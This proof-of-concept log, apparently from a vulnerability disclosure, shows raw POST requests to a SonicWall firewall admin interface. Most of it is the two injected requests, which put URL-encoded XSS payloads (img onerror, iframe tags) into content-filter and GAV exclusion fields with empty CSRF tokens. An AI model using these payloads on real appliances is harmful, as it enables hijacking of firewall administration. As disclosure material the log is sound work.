PoC Session Logs (POST) [Inject] and CSRF SonicWall

1. — Session Logs (Standard Request) —
2.  
3. Status: pending[]
4. POST https://utm_waf.sonicwall.localhost:8351/main.cgi
5. Mime Type[unknown]
6. Request Header:
7. Host[utm_waf.sonicwall.localhost:8351]
8. User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
9. Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
10. Accept-Language[de,en-US;q=0.7,en;q=0.3]
11. Accept-Encoding[gzip, deflate]
12. Referer[https://utm_waf.sonicwall.localhost:8351/addCfsLocalRating_-1.html]
13. Cookie[curUrl=securityServicesCFView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0;
14. 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0]
15. POST-Daten:
16. csrfToken[]
17. cfsRatingObjectName[test23]
18. cfsRatingCategory[2]
19. selectedItem[test.com]
20. itemList[test.com]
21. cfsRatingDomainList[test.com]
22. refresh_page[securityServicesCFView.html]
23. tableIndex[-1]
24. cgiaction[%5Bobject+Window%5D]
25.  
26. — PoC Session Logs (POST) [Inject] #1 —
27. Status: pending[]
28. POST https://utm_waf.sonicwall.localhost:8351/main.cgi
29. Mime Type[unknown]
30. Request Header:
31. Host[utm_waf.sonicwall.localhost:8351]
32. User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
33. Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
34. Accept-Language[de,en-US;q=0.7,en;q=0.3]
35. Accept-Encoding[gzip, deflate]
36. Referer[https://utm_waf.sonicwall.localhost:8351/addCfsLocalRating_-1.html]
37. Cookie[curUrl=systemStatusView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0;
38. 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0]
39. POST-Daten:
40. csrfToken[]
41. cfsRatingObjectName[+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3EMALIICOUS INJECTED PAYLOAD!]
42. cfsRatingCategory[9]
43. selectedItem[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
44. itemList[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
45. cfsRatingDomainList[testdomain.com++%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dprompt%2823%29%3B%26gt%3B+++%22%26gt%3B%26lt%3B%22%26lt%3Bimg+src%3D%22x%22%26gt%3B%2520%2520%26gt%3B%22%26lt%3Biframe+src%3Da%26gt%3B%2520%26lt%3Biframe%26gt%3B]
46. refresh_page[securityServicesCFView.html]
47. tableIndex[-1]
48. cgiaction[%5Bobject+Window%5D]
49.  
50. — PoC Session Logs (POST) [Inject] #2 —
51. Status: pending[]
52. POST https://utm_waf.sonicwall.localhost:8351/main.cgi
53. Mime Type[unknown]
54. Request Header:
55. Host[utm_waf.sonicwall.localhost:8351]
56. User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
57. Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
58. Accept-Language[de,en-US;q=0.7,en;q=0.3]
59. Accept-Encoding[gzip, deflate]
60. Referer[https://utm_waf.sonicwall.localhost:8351/gavCloudExclusions.html]
61. Cookie[curUrl=gavSummary.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0;
62. 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0; 2039=local; 2040=%7B%22refreshTime%22%3A3%2C%22
63. showTimeRange%22%3A10%2C%22refreshEnable%22%3Atrue%2C
64. %22viewApplications%22%3A1%2C%22viewBandwidth%22%3A1%2C%22viewPktRate%22%3A1%2C%22viewPktSize%22%3A1%2C%22
65. viewConnRate%22%3A1%2C%22viewConnCount%22%3A1%2C%22viewCoreMonitor%22%3A1%2C%22displayBandwidth%22%3A%22bwSelRate%22%2C
66. %22displayPktRate%22%3A%22pktRateSelRate%22%2C%22displayPktSize%22%3A%22pktSizeSelRate%22%2C%22displayConnRate%22%3A%22
67. connRateSelRate%22%2C%22displayConnCount%22%3A%22connCountSelCount%22%2C%22ipVerBandwidth%22%3A%222%22%2C
68. %22ipVerApps%22%3A%222%22%2C%22showMostFrequentApps%22%3Afalse%2C%22inChartAppLegends%22%3Afalse%2C%22hideAppLegends%22%3Atrue%2C%22inChartBwLegends
69. %22%3Afalse%2C%22hideBwLegends%22%3Atrue%2C%22hidePktRateLegends%22%3Atrue%2C
70. %22hidePktSizeLegends%22%3Atrue%2C%22hideConnRateLegends%22%3Atrue%2C%22hideConnCountLegends%22%3Atrue%2C%22hideAppChart%22%3Afalse%2C%22hideBwChart
71. %22%3Afalse%2C%22hidePktRateChart%22%3Afalse%2C%22hidePktSizeChart%22%3Afalse%2C
72. %22hideConnRateChart%22%3Afalse%2C%22hideConnCountChart%22%3Afalse%2C%22hideCoreMonChart%22%3Afalse%2C%22hideMemoryMonChart%22%3Afalse%2C%22rtAppColors
73. %22%3A%5B%22%23081D58%22%2C%22%23253494%22%2C%22%23225EA8%22%2C%22%231D91C0%22%2C
74. %22%2341B6C4%22%2C%22%237FCDBB%22%2C%22%23C7E9B4%22%2C%22%23EDF8B1%22%2C%22%23FFFFD9%22%5D%2C%22rtDataColors
75. %22%3A%5B%22%23E41A1C%22%2C%22%23377EB8%22%2C%22%234DAF4A%22%2C%22%23984EA3%22%2C%22%23FF7F00%22%2C%22%23FFFF33%22%2C
76. %22%23A65628%22%2C%22%23F781BF%22%2C%22%23999999%22%2C%22%235A6B34%22%2C%22%23F0D64E%22%2C%22%23D7B740%22%2C%22%23AB80
77. 24%22%2C%22%23925818%22%2C%22%23DB5A6E%22%2C%22%23071D69%22%2C%22%230A1650%22%2C%22%234571DA%22%2C%22%23E18B5C%22%2C
78. %22%23028482%22%2C%22%237ABA7A%22%2C%22%23B76EB8%22%5D%2C%22useGradient%22%3Atrue%7D]
79.  
80.  
81. POST-Daten:
82. csrfToken[???]
83. inputbox[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
84. list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
85. gav_cloud_exclude_list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
86. gav_cloud_refresh_exclusions[]
87. refresh_page[gav_cloud.html]
88. isobject[1]
89. cgiaction[%5Bobject+Window%5D]